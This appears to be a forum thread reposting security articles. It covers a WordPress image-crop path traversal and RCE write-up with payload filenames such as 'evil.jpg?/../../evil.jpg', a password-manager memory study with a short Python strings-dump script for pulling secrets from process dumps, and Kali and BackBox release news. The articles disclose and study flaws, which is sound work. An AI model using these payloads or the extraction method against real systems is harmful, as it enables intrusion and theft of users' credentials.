The Path Traversal takes place in the wp_crop_image() function which gets called when a user crops an image. The function takes the ID of an image to crop ($attachment_id) and fetches the corresponding _wp_attached_file Post Meta entry from the database. Remember that due to the flaw in edit_post(), $src_file can be set to anything.

Simplified wp_crop_image() function. The actual code is located in wp-admin/includes/image.php:

function wp_crop_image( $attachment_id, $src_x, ...) {
    $src_file = $file = get_post_meta( $attachment_id, '_wp_attached_file' );
    ⋮

In the next step, WordPress has to make sure the image actually exists and load it. WordPress has two ways of loading the given image. The first is to simply look for the filename provided by the _wp_attached_file Post Meta entry in the wp-content/uploads directory (line 2 of the next code snippet). If that method fails, WordPress will try to download the image from its own server as a fallback. To do so it will generate a download URL consisting of the URL of the wp-content/uploads directory and the filename stored in the _wp_attached_file Post Meta entry (line 6).

To give a concrete example: If the value stored in the _wp_attached_file Post Meta entry was evil.jpg, then WordPress would first try to check if the file wp-content/uploads/evil.jpg exists. If not, it would try to download the file from the following URL: https://targetserver.com/wp-content/uploads/evil.jpg. The reason for trying to download the image instead of looking for it locally is for the case that some plugin generates the image on the fly when the URL is visited. Take note that no sanitization whatsoever is performed here. WordPress will simply concatenate the upload directory and the URL with the $src_file user input. Once WordPress has successfully loaded a valid image via wp_get_image_editor(), it will crop the image.

 1  ⋮
 2  if ( ! file_exists( "wp-content/uploads/" . $src_file ) ) {
 3      // If the file doesn't exist, attempt a URL fopen on the src link.
 4      // This can occur with certain file replication plugins.
 5      $uploads = wp_get_upload_dir();
 6      $src = $uploads['baseurl'] . "/" . $src_file;
 7  } else {
 8      $src = "wp-content/uploads/" . $src_file;
 9  }
10
11  $editor = wp_get_image_editor( $src );
12  ⋮

The cropped image is then saved back to the filesystem (regardless of whether it was downloaded or not). The resulting filename is going to be the $src_file returned by get_post_meta(), which is under control of an attacker. The only modification made to the resulting filename string is that the basename of the file is prepended by cropped- (line 4 of the next code snippet). To follow the example of the evil.jpg, the resulting filename would be cropped-evil.jpg. WordPress then creates any directories in the resulting path that do not exist yet via wp_mkdir_p() (line 6). It is then finally written to the filesystem using the save() method of the image editor object.
The save() method also performs no Path Traversal checks on the given file name.

 1  ⋮
 2  $src = $editor->crop( $src_x, $src_y, $src_w, $src_h, $dst_w, $dst_h, $src_abs );
 3
 4  $dst_file = str_replace( basename( $src_file ), 'cropped-' . basename( $src_file ), $src_file );
 5
 6  wp_mkdir_p( dirname( $dst_file ) );
 7
 8  $result = $editor->save( $dst_file );

The idea

So far, we have discussed that it is possible to determine which file gets loaded into the image editor, since no sanitization checks are performed. However, the image editor will throw an exception if the file is not a valid image. The first assumption might be that it is only possible to crop images outside the uploads directory then. However, the circumstance that WordPress tries to download the image if it is not found leads to a Remote Code Execution vulnerability.

                                     Local File                                 HTTP Download
Uploaded file                        evil.jpg                                   evil.jpg
_wp_attached_file                    evil.jpg?shell.php                         evil.jpg?shell.php
Resulting file that will be loaded   wp-content/uploads/evil.jpg?shell.php      https://targetserver.com/wp-content/uploads/evil.jpg?shell.php
Actual location                      wp-content/uploads/evil.jpg                https://targetserver.com/wp-content/uploads/evil.jpg
Resulting filename                   None - image loading fails                 evil.jpg?cropped-shell.php

The idea is to set _wp_attached_file to evil.jpg?shell.php, which would lead to a HTTP request being made to the following URL: https://targetserver.com/wp-content/uploads/evil.jpg?shell.php. This request would return a valid image file, since everything after the ? is ignored in this context. The resulting filename would be evil.jpg?shell.php. However, although the save() method of the image editor does not check against Path Traversal attacks, it will append the extension of the mime type of the image being loaded to the resulting filename. In this case, the resulting filename would be evil.jpg?cropped-shell.php.jpg. This renders the newly created file harmless again. However, it is still possible to plant the resulting image into any directory by using a payload such as evil.jpg?/../../evil.jpg.

Exploiting the Path Traversal - LFI in Theme directory

Each WordPress theme is simply a directory located in the wp-content/themes directory of WordPress and provides template files for different cases. For example, if a visitor of a blog wants to view a blog post, WordPress looks for a post.php file in the directory of the currently active theme. If it finds the template it will include() it.

In order to add an extra layer of customization, it is possible to select a custom template for certain posts. To do so, a user has to set the _wp_page_template Post Meta entry in the database to such a custom filename. The only limitation here is that the file to be include()'ed must be located in the directory of the currently active theme. Usually, this directory cannot be accessed and no files can be uploaded. However, by abusing the above described Path Traversal, it is possible to plant a maliciously crafted image into the directory of the currently used theme. The attacker can then create a new post and abuse the same bug that enabled him to update the _wp_attached_file Post Meta entry in order to include() the image. By injecting PHP code into the image, the attacker then gains arbitrary Remote Code Execution.

Crafting a malicious image - GD vs Imagick

WordPress supports two image editing extensions for PHP: GD and Imagick. The difference between them is that Imagick does not strip exif metadata of the image, in which PHP code can be stored.
GD compresses each image it edits and strips all exif metadata. This is a result of how GD processes images. However, exploitation is still possible by crafting an image that contains specially chosen pixels that will be flipped in a way that results in PHP code execution once GD is done cropping the image. During our efforts to research the internal structures of PHP's GD extension, an exploitable memory corruption flaw was discovered in libgd (CVE-2019-6977).

Time Line

2018/10/16 - Vulnerability reported to the WordPress security team on Hackerone.
2018/10/18 - A WordPress Security Team member acknowledges the report and says they will come back once the report is verified.
2018/10/19 - Another WordPress Security Team member asks for more information.
2018/10/22 - We provide WordPress with more information and provide a complete, 270 line exploit script to help verify the vulnerability.
2018/11/15 - WordPress triages the vulnerability and says they were able to replicate it.
2018/12/06 - WordPress 5.0 is released, without a patch for the vulnerability.
2018/12/12 - WordPress 5.0.1 is released and is a security update. One of the patches makes the vulnerabilities non-exploitable by preventing attackers from setting arbitrary Post Meta entries. However, the Path Traversal is still possible and can be exploited if plugins are installed that incorrectly handle Post Meta entries. WordPress 5.0.1 does not address either the Path Traversal or Local File Inclusion vulnerability.
2018/12/19 - WordPress 5.0.2 is released, without a patch for the vulnerability.
2019/01/09 - WordPress 5.0.3 is released, without a patch for the vulnerability.
2019/01/28 - We ask WordPress for an ETA of the next security release so we can coordinate our blog post schedule and release the blog post after the release.
2019/02/14 - WordPress proposes a patch.
2019/02/14 - We provide feedback on the patch and verify that it prevents exploitation.

Summary

This blog post detailed a Remote Code Execution in the WordPress core that was present for over 6 years. It became non-exploitable with a patch for another vulnerability reported by RIPS in versions 5.0.1 and 4.9.9. However, the Path Traversal is still possible and can be exploited if a plugin is installed that still allows overwriting of arbitrary Post Data. Since certain authentication to a target WordPress site is needed for exploitation, we decided to make the vulnerability public 4 months after initially reporting the vulnerabilities. We would like to thank the volunteers of the WordPress security team, who have been very friendly and acted professionally when working with us on this issue.

Sursa: https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
Password Managers: Under the Hood of Secrets Management February 19, 2019 Also see associated blog Abstract: Password managers allow the storage and retrieval of sensitive information from an encrypted database. Users rely on them to provide better security guarantees against trivial exfiltration than alternative ways of storing passwords, such as an unsecured flat text file. In this paper we propose security guarantees password managers should offer and examine the underlying workings of five popular password managers targeting the Windows 10 platform: 1Password 7 [1], 1Password 4 [1], Dashlane [2], KeePass [3], and LastPass [4]. We anticipated that password managers would employ basic security best practices, such as scrubbing secrets from memory when they are not in use and sanitization of memory once a password manager was logged out and placed into a locked state. However, we found that in all password managers we examined, trivial secrets extraction was possible from a locked password manager, including the master password in some cases, exposing up to 60 million users that use the password managers in this study to secrets retrieval from an assumed secure locked state. Introduction: First and foremost, password managers are a good thing. All password managers we have examined add value to the security posture of secrets management, and as Troy Hunt, an active security researcher once wrote, “Password managers don’t have to be perfect, they just have to be better than not having one” [5]. Aside from being an administrative tool to allow users to categorize and better manage their credentials, password managers guide users to avoid bad password practices such as using weak passwords, common passwords, generic passwords, and password reuse. The tradeoff is that users’ credentials are then centrally stored and managed, typically protected by a single master password to unlock a password manager data store. With the rising popularity of password manager use it is safe to assume that adversarial activity will target the growing user base of these password managers. Table 1, below, outlines the number of individual users and business entities for each of the password managers we examine in this paper. Password Manager Users Business Entities 1Password 15,000,000 [6] 30,000 [6] Dashlane 10,000,000 [7] 10,000 [7] KeePass 20,000,000 [8] Unknown LastPass 16,500,000 [9] 43,000 [9] Table 1. Number of private users and business entities of 1Password (all versions), Dashlane, KeePass and LastPass. Motivation: With the proliferation of online services, password use has gone from about 25 passwords per user in 2007 [10] to 130 in 2015 and is projected to grow to 207 in 2020 [11]. This, combined with a userbase of 60 million across password managers we examine in this paper, creates a target rich environment in which adversaries can carefully craft methods to extract an increasingly growing and valuable trove of secrets and credentials. An example in which a password manager appears to have been specifically targeted is an attack that led to the loss of 2578 units of Ethereum (ETH), a cryptocurrency valued at the time of 1.5 million USD. The attack was carried out against a cryptocurrency trading assistant platform, Taylor [12]. Taylor issued a statement that indicated a device which was using 1Password for secrets management was compromised [13]. 
It remains unclear, whether the attacker found a security issue in 1Password itself or simply discovered the master password in some other way, or whether the compromise had nothing to do with password managers. Given the combination of an increasing number of credentials held in password managers, the value of those secrets and the emerging threats specifically targeting password managers it is important for us to examine the increased risk a user or organization faces in terms of secrets exposure when using a password manager. Our approach for this was to survey popular password managers to determine common defenses they employ against secrets exfiltration. We incorporate the best security features of each into a hypothetical, best possible password manager, that provides a minimum set of guarantees outlined in the next section. Then we compare the password managers studied against those security guarantees. Password Manager Security Guarantees: All password managers studied work in the same basic way. Users enter or generate passwords in the software and add any pertinent metadata (e.g., answers to security questions, and the site the password goes to). This information is encrypted and then decrypted only when it is needed for display, for passing to a browser add-on that fills the password into a website, or for copying to the clipboard for use. Throughout this paper we will refer to password managers in three states of existence: not running, unlocked (and running), and locked (and running; this state assumes the password manager was previously unlocked). We assume that the user does not have additional layers of encryption such as full disk encryption or per process virtualization. We define the three states below: Not Running We define “not running” as a state where the password manager has previously been installed, configured, and interacted with by the user to store secrets, but has not been launched since the last reboot or has been terminated by the user since it was last used. In this “not running” state the password manager should guarantee: There should be no data stored on disk that would offer an attacker leverage toward compromising the database stored on disk (e.g. the master password or encryption key stored in a configuration file). Even if an attacker retrieves the password database from disk, it should be encrypted in such a way that an attacker cannot decrypt it without knowing the master password. The encryption should be designed in such a way that, so long as the user did not use a trivial password, the attacker cannot brute force guess the master password in a reasonable amount of time using commonly available computing resources. Running: Unlocked State We define running in an “unlocked state” as cases where the password manager is running, and where the user has typed in the master password in order to decrypt and access the stored passwords inside the manager. The user may have displayed, copied to clipboard, or otherwise accessed some of the passwords in the password manager. In this “running, unlocked state” the password manager should guarantee: It should not be possible to extract the master password from memory, either directly or in any form that allows the original master password to be recovered. For those stored passwords that have not been displayed/copied/accessed by the user since the password manager was unlocked, it should not be possible to extract those unencrypted passwords from memory. 
Knowing usability constraints that affect password managers, we concede that: It may be possible to extract those passwords from memory that were displayed/copied/accessed in the current unlocked session. It may be possible to extract cryptographic information derived from the master password sufficient to decrypt other stored passwords, but not the master password itself. Running: Locked State We define “in locked state” as cases where (1) the password manager was just launched but the user has not entered the master password yet, or (2) the user previously entered the master password and used the password manager, but subsequently clicked the ‘Lock’ or ‘Log Out’ button. In this “running, locked state” the password manager should guarantee: All the security guarantees of a not-running password manager should apply to a password manager that is in the locked state. Since a locked password manager still exists as a process in virtual memory, this requires additional guarantees: It should not be possible to extract the master password from memory, either directly or in any form that allows the original master password to be recovered. It should not be possible to extract from memory any cryptographic information derived from the master password that might allow passwords to be decrypted without knowing the master password. It should not be possible to extract any unencrypted passwords from memory that are stored in the password manager. In addition to these explicit security guarantees, we expect password managers to incorporate additional hardening measures where possible, and to have these hardening measures enabled by default. For example, password managers should attempt to block software keystroke loggers from accessing the master password as it is typed, attempt to limit the exposure of unencrypted passwords left on the clipboard, and take reasonable steps to detect and block modification or patching of the password manager and its supporting libraries that might expose passwords. Scope: In this paper we will examine the inner workings as they relate to secrets retrieval and storage of 1Password, Dashlane, KeePass and LastPass on the Windows 10 platform (Version 1803 Build 17134.345) using an Intel i7-7700HQ processor. We examine susceptibility of a password manager to secrets exfiltration via examination of the password database on disk; memory forensics; and finally, keylogging, clipboard monitoring, and binary modification. Each password manager is examined in its default configuration after install with no advanced configuration steps performed. The focus on our evaluation of password managers is limited to the Windows platform. Our findings can be extrapolated to password manager implementations in other operating systems to guide research to areas of interest that are discussed in this paper. Target Password Managers: The following password managers with their corresponding versions were evaluated: Product Version 1Password4 for Windows 4.6.2.626 1Password7 for Windows 7.2.576 Dashlane for Windows 6.1843.0 KeePass Password Safe 2.40 LastPass for Applications 4.1.59 Security of Password Managers in the Non-Running State We first consider the security of password managers when they are not running. We focus on the attack vector of compromising passwords from disk. 
Unless password managers have severe vulnerabilities such as logging passwords to unencrypted log files or other egregious issues, the password managers’ defenses against the disk attack surface rest on the cryptography used to protect the password database. Here, we examine which algorithm each password manager uses to transform the master password into an encryption key, and whether the algorithm and number of iterations is severely lacking in its ability to resist contemporary cracking attacks. Table 2, below, outlines the key expansion algorithm type used and number of iterations in each password manager’s default configuration. With regard to key expansion recommendations set by NIST [14]we found that each key expansion algorithm used in the password managers was acceptable and that the number of iterations adequate. We concluded that the password managers were secure against compromising passwords from disk as the software is not running, and that brute forcing the encrypted password entries on disk would be computationally prohibitive, although not impossible if given enough computing resources. Given this, we moved on to the attack surface of passwords stored in memory while the password managers are running. Password Manager Key Expansion Algorithm Iterations 1Password4 PBKDF2-SHA256 40,000 [15] 1Password7 PBKDF2-SHA256 100,000 [16] Dashlane Argon2 3 [17] KeePass AES-KDF 60,000 [18] LastPass PBKDF2-SHA256 100,100 [19] Table 2. Each password managers default key expansion algorithm and number of iterations. Security of Password Managers in Running States We expected and found that all password managers reviewed sufficiently protect the master password and individual passwords while they are notrunning. The remaining bulk of our assessment of password managers in the running state was focused on the effectiveness of the locked state and whether the unlocked state left the minimum possible amount of sensitive information in memory. The following sections outline violations of our proposed security guarantees of password managers in a running locked and unlocked state. 1Password4 (Version: 4.6.2.626) We assessed the security of 1Password4 while running and found reasonable protections against exposure of individual passwords in the unlocked state; unfortunately, this was overshadowed by its handling of the master password and several broken implementation details when transitioning from the unlocked to the locked state. On the positive side, we found that as a user accesses different entries in 1Password4, the software is careful to clear the previous unencrypted password from memory before loading another. This means that only one unencrypted password can be in memory at once. On the negative side, the master password remains in memory when unlocked (albeit in obfuscated form) and the software fails to scrub the obfuscated password memory region sufficiently when transitioning from the unlocked to the locked state. We also found a bug where, under certain user actions, the master password can be left in memory in cleartext even while locked. Failure to Scrub Obfuscated Master Password from Memory It is possible to recover and deobfuscate the master password from 1Password4 since it is not scrubbed from memory after placing the password manager in a locked state. Given a scenario where a user has unlocked 1Password4 and then placed it back into a locked state, 1Password4 will prompt for the master password again as shown in Figure 1below. 
However, 1Password4 retains the master password in memory, although in an encoded/obfuscated format as shown in Figure 2. Figure 1. 1Password4 in a locked state awaiting master password input. Figure 2. Encoded master password present in memory while 1Password4 is in a locked state. We can use this information to intercept normal workflows in which 1Password4 calls RtlRunEncodeUnicodeString and RtlRunDecodeUnicodeString to obfuscate the master password to instead reveal the already present, but encoded master password into cleartext (Figure 3). Figure 3. Master password revealed after the expected RtlRunEncodeUnicodeString and RtlRunDecodeUnicodeString was reversed, thereby forcing 1Password4 to decode the encoded master password that was not scrubbed from memory. Copying the Current Password Entry from Memory Only entries that are actively being interacted with exist in memory as plaintext. Figure 4is an example of an entry in memory as its being interacted with. Once 1Password4 is locked, the memory region is deallocated . Note that the deallocated region is not first scrubbed, however the Windows memory manager will zero out any freed pages of memory before making them available for re-allocation by the Windows memory manager. Figure 4. Password entry in memory during active interaction. 1Password7 (Version: 7.2.576) After assessing the legacy 1Password4, we moved on to 1Password7, the current release. Surprisingly, we found that it is less secure in the running state compared to 1Password4. 1Password7 decrypted all individual passwords in our test database as soon as it is unlocked and caches them in memory, unlike 1Password4 which kept only one entry at a time in memory. Compounding this, we found that 1Password7 scrubs neither the individual passwords, the master password, nor the secret key (an extra field introduced in 1Password6 that combines with the master password to derive the encryption key) from memory when transitioning from unlocked to locked. This renders the “lock” button ineffective; from the security standpoint, after unlocking and using 1Password7, the user must exit the software entirely in order to clear sensitive information from memory as locking should. It appears 1Password may have rewritten their software to produce 1Password7 without implementing secure memory management and secrets scrubbing workflows present in 1Password4 and abandoning the distinction between a ‘running unlocked’ and ‘running locked’ state in terms of secrets exposure. Interestingly, this is not the case. Prior marketing material for 1Password claimed [20]to feature Intel SGX technology. This technology protects secrets inside secure memory enclaves so that other processes and even higher privileged components (such as the kernel) cannot access them. Were SGX to be implemented correctly, 1Password7 would have been the most secure password manager in our research by far. Unfortunately, SGX was only supported as a beta feature in 1Password6 and early versions of 1Password7, and was dropped for later versions. This was only evident from gathering the details about it on a 1Password support forum [21]. Exposure of Cleartext Master Password, Secret Key and Entries in Memory As stated before, all secrets are exposed by 1Password7 when in an unlocked and locked state. To demonstrate the severity of this issue we created proof of concept code to read 1Password7’s memory address space to extract these items. 
The proof of concept applications ran in the existing user context (which was an ordinary non-administrative user). Shown below in Figure 5 is 1Password7 in a locked state (having previously been unlocked but then locked again), awaiting password entry to unlock it.

Figure 5. 1Password7 in a locked state, having previously been open and then locked.

Figure 6 illustrates the automated retrieval of the master password.

Figure 6. Extracting the master password from a locked 1Password7 instance.

Figure 7 shows the extraction of the secret key that is needed along with the master password to unlock an encrypted database, and Figure 8 shows the automated extraction of secret entries.

Figure 7. Extracting the secret key from 1Password7 in a locked state.

Figure 8. Extracting password entries from a locked instance of 1Password7.

The memory "hygiene" of 1Password7 is so lacking that it is possible for it to leak passwords from memory without an intentional attack at all. During our evaluation of 1Password7, we encountered a system stop error (kernel mode exception) on our Windows 10 workstation, from an unrelated hardware issue, that created a full memory debug dump to disk. While examining this memory dump file, we came across our secrets, which 1Password7 had held in cleartext, in memory, in a locked state when the stop error occurred (Figure 9).

Figure 9. Windows 10 crash dump file contained secrets 1Password7 held in memory in a locked state.

For all password managers that leave secrets in memory, this creates a threat model where secrets may be extracted in a non-running state as a by-product of system activity and/or crash/debug log files. Moreover, some companies have a policy of imaging workstations that have had malware encounters as part of the incident response procedure. A user that happened to be running 1Password7 while this procedure was initiated should assume that all secrets have been compromised.

Dashlane (Version: 6.1843.0)

In our Dashlane evaluation, we noted workflows that indicate focus was placed on concealing secrets in memory to reduce their likelihood of extraction. Also unique to Dashlane was the usage of memory/string and GUI management frameworks that prevented secrets from being passed around to various OS APIs that could expose them to eavesdropping by trivial malware. Similar to 1Password4, Dashlane exposes only the active entry a user is interacting with. So, at most, the last active entry is exposed in memory while Dashlane is in an unlocked or locked state. However, once a user updates any information in an entry, Dashlane exposes the entire database in plaintext in memory, and it remains there even after Dashlane is logged out of or 'locked'.

Exposure of Cleartext Entries in Memory

Password entries in Dashlane are stored in an XML object. Upon interacting with any entry, this XML object becomes exposed in cleartext and can be easily extracted in both locked and unlocked states. Figure 10, below, is an example of a portion of this XML data structure.

Figure 10. Excerpt of a fully decrypted Dashlane XML password database in an unlocked and locked state.

Knowing that this data structure exists in a locked state, we then created a proof of concept application to extract it from a locked instance of Dashlane. Figure 11, below, is a locked instance of Dashlane prompting for the master password to unlock it.

Figure 11. Locked instance of Dashlane.

In this locked state, we then run our proof of concept to extract all stored secrets (Figure 12).

Figure 12. Extracting secrets from a locked instance of Dashlane.
However, even though we are able to extract secrets from Dashlane in a locked state, the memory region they reside in has been dereferenced and freed, so over time portions of the XML data structure may be overwritten. Throughout our examination, we noticed that secrets may reside for only a few minutes; in some instances, we observed them still resident in memory more than 24 hours later. Dashlane is also unique compared to the other password managers in our examination in that it does not allow you to exit the process via GUI components, such as clicking the close program [x] in the upper right or pressing the ALT-F4 key combination. Doing so causes Dashlane to minimize into the task tray, leaving it susceptible to secrets extraction for extended periods of time.

KeePass (Version: 2.40)

Unlike the other password managers, KeePass is an open source project. Similar to 1Password4, KeePass decrypts entries as they are interacted with; however, they all remain in memory since they are not individually scrubbed after each interaction. The master password is scrubbed from memory and not recoverable. However, while KeePass attempts to keep secrets secure by scrubbing them from memory, there are evidently errors in these workflows, as we discovered that even in a locked state we were able to extract entries that had been interacted with. KeePass claims to use several defense-in-depth memory protection mechanisms, as stated in an excerpt from their site below (Figure 13). However, they acknowledge that these workflows may involve Windows OS APIs that may make copies of various memory buffers which may not be exposed to KeePass for scrubbing.

Figure 13. KeePass statement on memory protection.

Exposure of Cleartext Entries in Memory

Entries that have been interacted with remain exposed in memory even after KeePass has been placed into a locked state. Figure 14, below, is an example of a locked instance of KeePass prompting for the master password before it can be unlocked.

Figure 14. Locked instance of KeePass.

Secrets are scattered in memory with no references. However, performing a simple strings dump of the KeePass process memory reveals a list of entries that have been interacted with (Figure 15).

Figure 15. List of entries from a locked instance of KeePass.

Using the above information, we can then search for the username of an entry and locate its corresponding password field; in the image below (Figure 16) we locate the bitcoin private key that was stored in the password field.

Figure 16. Locating a bitcoin private key via its corresponding public key/username.

The above methodology can be used to extract any entries that have been interacted with before placing KeePass into a locked state.

LastPass (Version: 4.1.59)

Similar to 1Password4, LastPass obfuscates the master password as it's being typed into the unlock field. Once the decryption key has been derived from the master password, the master password is overwritten with the phrase "lastpass rocks" (Figure 17).

Figure 17. Master password overwritten once the master password has been used in a PBKDF2 key expansion routine.

Once LastPass enters an unlocked state, database entries are decrypted into memory only upon user interaction. However, these entries persist in memory even after LastPass has been placed back into a locked state.
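The "simple strings dump" methodology described for KeePass above (and reused against LastPass in the next section) can be approximated with a few lines of Python run over a raw memory dump of the target process — for example one produced with Task Manager's "Create dump file" option or Sysinternals procdump. This is only a sketch, not the tooling used in the paper; the dump path and minimum string length are arbitrary illustration values.

import re
import sys

def dump_strings(path, min_len=6):
    """Yield printable ASCII and UTF-16LE strings found in a raw memory dump file."""
    with open(path, "rb") as f:
        data = f.read()
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for match in ascii_re.finditer(data):
        yield match.group().decode("ascii")
    for match in utf16_re.finditer(data):
        yield match.group().decode("utf-16-le")

if __name__ == "__main__":
    # Hypothetical usage: python strings_dump.py keepass.dmp 6
    for s in dump_strings(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 6):
        print(s)

Grepping the resulting output for entry titles, usernames, or known marker phrases is enough to reproduce the kind of results shown in the figures that follow.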
Exposure of Cleartext Master Password and Entries in Memory

During a workflow to derive the decryption key, the master password is leaked into a string buffer in memory and never scrubbed, even when LastPass is placed into a locked state. The image below, Figure 18, is an instance of LastPass in a locked state awaiting user entry of the master password.

Figure 18. Locked instance of LastPass.

In this locked state, we can recover the master password and any password entries that have been interacted with, using the same methodology used against KeePass, in which a simple strings dump is performed on the active process. The image below, Figure 19, is an example of recovering the master password in a locked state; ironically, it is always found within a few lines of 'lastpass rocks', the phrase used to conceal the master password in another buffer.

Figure 19. Master password in cleartext (underlined red) typically within a few lines of 'lastpass rocks'.

Strings encapsulated by an '<input hwnd=' tag allow us to enumerate all secret entries that have been interacted with. Below, Figure 20, is an example of extracting the private key to a bitcoin wallet.

Figure 20. Extracting a bitcoin private key from a locked instance of LastPass.

Conclusion

All password managers we examined sufficiently secured user secrets while in a 'not running' state. That is, if a password database were to be extracted from disk and a strong master password was used, then brute forcing of a password manager would be computationally prohibitive. Each password manager also attempted to scrub secrets from memory, but residual buffers remained that contained secrets, most likely due to memory leaks, lost memory references, or complex GUI frameworks which do not expose internal memory management mechanisms to sanitize secrets. This was most evident in 1Password7, where secrets, including the master password and its associated secret key, were present in both a locked and an unlocked state. This is in contrast to 1Password4, where, at most, a single entry is exposed in a 'running unlocked' state and the master password exists in memory in an obfuscated form, but is easily recoverable. If 1Password4 scrubbed the master password memory region upon successful unlocking, it would comply with all of the proposed security guarantees we outlined earlier.

This paper is not meant to criticize specific password manager implementations; rather, it is meant to establish a reasonable minimum baseline which all password managers should comply with. It is evident that attempts are made to scrub sensitive memory in all of the password managers. However, each password manager fails to implement proper secrets sanitization for various reasons. The image below, Figure 21, summarizes the results of our evaluation:

Figure 21. Summary of the security items we examined for each password manager.

Keylogging and clipboard sniffing are known risks included only for user awareness: no matter how closely a password manager may adhere to our proposed 'security guarantees', victims of keylogging or clipboard-sniffing malware have no protection. The significant violations of our proposed security guarantees, however, are highlighted in red. In an unlocked state, all or a majority of secret records should not be extracted into memory; only the single record being actively viewed should be. Also, in an unlocked state, the master password should not be present in either an encrypted or obfuscated form.
A locked running state that exposes interacted-with records, or all records, puts users' secret records unnecessarily at risk. Most egregious is the presence of the master password in a locked state. It is unknown how widespread this knowledge is amongst adversaries; however, up to 60 million users of these password managers are potentially at risk of a targeted attack directed at the software that is meant to safeguard their secrets.

In our opinion, the most urgent item is to sanitize secrets when a password manager is placed into a locked state. Typically, most password managers place themselves into this locked state after a certain period of user inactivity, after which the process may remain running indefinitely until the OS is restarted, the process is terminated by the user, or the process restarts itself as part of a self-update workflow when a new version is published. This creates a large window of time in which secrets for certain password managers reside in cleartext in memory, available for extraction.

In addition to providing a minimum set of guarantees users can rely on, creators of password managers should employ additional defenses to protect secrets by:

- Detecting or employing methods to, by default, thwart software-based keyloggers
- Preventing secrets exposure in an unlocked state
- Employing hardware-based features (such as SGX) to make it more difficult to extract secrets
- Employing trivial malware and runtime process modification detection mechanisms
- Employing per-install binary scrambling during the install phase to give each instance a unique binary layout, to thwart trivial and advanced targeted malware
- Limiting the traversal of secrets through OS-provided APIs by implementing custom GUI elements and memory management, to limit secrets exposure to well-known APIs that can be targeted by malware authors

End users should, as always, employ security best practices to limit exposure to adversarial activity, such as:

- Keeping the OS updated
- Enabling or utilizing well known and tested anti-virus solutions
- Utilizing features provided by some password managers, such as "Secure Desktop"
- Using hardware wallets for immediately exploitable sensitive data such as cryptocurrency private keys
- Utilizing the auto-lock feature of their OS to prevent 'walk by' targeted malicious activity
- Selecting a strong master password to thwart brute force attempts against a compromised encrypted database file
- Using full disk encryption to prevent the possibility of secrets extraction from crash logs and associated memory dumps, which may include decrypted password manager data
- Shutting a password manager down completely when not in use, even in a locked state (if using one that doesn't properly sanitize secrets upon being placed into a locked running state)

Future Research

Password managers are an important and increasingly necessary part of our lives. In our opinion, users should expect that their secrets are safeguarded according to the minimum set of standards that we outlined as 'security guarantees'. Initially, our assumption and expectation were that password managers are designed to safeguard secrets in a 'non-running state', which we confirmed to be true. However, we were surprised by the inconsistency in secrets sanitization and retention in memory in a running unlocked state and, more importantly, when placed into a locked state.
If password managers fail to sanitize secrets in a locked running state, then this will be the low-hanging fruit that provides the path of least resistance to successful compromise of a password manager running on a user's workstation. Once the minimum set of 'security guarantees' is met, password managers should be re-evaluated to discover new attack vectors that adversaries may use to compromise them, and to examine possible mitigations.

References:

[1] "1Password," [Online]. Available: https://1password.com.
[2] "Dashlane," [Online]. Available: https://www.dashlane.com/.
[3] "KeePass," [Online]. Available: https://keepass.info/.
[4] "LastPass," [Online]. Available: https://www.lastpass.com/.
[5] T. Hunt, [Online]. Available: https://www.troyhunt.com/password-managers-dont-have-to-be-perfect-they-just-have-to-be-better-than-not-having-one/.
[6] [Online]. Available: https://twitter.com/roustem.
[7] [Online]. Available: https://blog.dashlane.com/10-million-users/.
[8] [Online]. Available: https://keepass.info/help/kb/trust.html.
[9] [Online]. Available: https://www.lastpass.com/.
[10] D. Florencio, C. Herley and P. C. v. Oorschot, "An Administrator's Guide to Internet Password Research," [Online]. Available: https://www.microsoft.com/en-us/research/wp-content/uploads/2014/11/WhatsaSysadminToDo.pdf.
[11] T. L. Bras, "Online Overload – It's Worse Than You Thought," [Online]. Available: https://blog.dashlane.com/infographic-online-overload-its-worse-than-you-thought/.
[12] "Smart Taylor," [Online]. Available: https://smarttaylor.io/.
[13] Taylor, [Online]. Available: https://medium.com/smarttaylor/updates-on-the-taylor-hack-incident-8843238d1670.
[14] NIST SP 800-132, [Online]. Available: http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-132.pdf.
[15] [Online]. Available: https://support.1password.com/pbkdf2/.
[16] [Online]. Available: https://support.1password.com/pbkdf2/.
[17] [Online]. Available: https://www.dashlane.com/download/Dashlane_SecurityWhitePaper_October2018.pdf.
[18] [Online]. Available: https://keepass.info/help/base/security.html.
[19] "LastPass," [Online]. Available: https://blog.lastpass.com/2018/07/lastpass-bugcrowd-update.html/.
[20] J. Goldberg, "Using Intel's SGX to keep secrets even safer," [Online]. Available: https://blog.1password.com/using-intels-sgx-to-keep-secrets-even-safer/.
[21] "1Password support forum," [Online]. Available: https://discussions.agilebits.com/discussion/87834/intel-sgx-stopped-working-its-working-but-the-option-is-not-in-yet.

Sursa: https://www.securityevaluators.com/casestudies/password-manager-hacking/
-
Kali Linux 2019.1 Released — Operating System For Hackers
February 18, 2019 — Swati Khandelwal

Wohooo! Great news for hackers and penetration testers. Offensive Security has just released Kali Linux 2019.1, the first 2019 version of its Swiss army knife for cybersecurity professionals. The latest version of the Kali Linux operating system includes the kernel up to version 4.19.13 and patches for numerous bugs, along with much updated software, like Metasploit, theHarvester, DBeaver, and more. Kali Linux 2019.1 comes with the latest version of the Metasploit penetration testing tool (version 5.0), which "includes database and automation APIs, new evasion capabilities, and usability improvements throughout," making it a more efficient platform for penetration testers. Metasploit version 5.0 is the software's first major release since version 4.0, which came out in 2011.

Talking about ARM images, Kali Linux 2019.1 has once again added support for Banana Pi and Banana Pro, which are on kernel version 4.19. "Veyron has been moved to a 4.19 kernel, and the Raspberry Pi images have been simplified, so it is easier to figure out which one to use," the Kali Linux project maintainers say in their official release announcement. "There are no longer separate Raspberry Pi images for users with TFT LCDs because we now include re4son's kalipi-tft-config script on all of them, so if you want to set up a board with a TFT, run 'kalipi-tft-config' and follow the prompts."

The Offensive Security virtual machine and ARM images have also been updated to the latest 2019.1 version. You can download the new Kali Linux ISOs directly from the official website or from the Torrent network, and if you are already using it, you can simply upgrade to the latest and greatest Kali release by running the command: apt update && apt -y full-upgrade.

Sursa: https://thehackernews.com/2019/02/kali-linux-hackers-os.html
-
BackBox Linux 5.3 released!
February 18, 2019

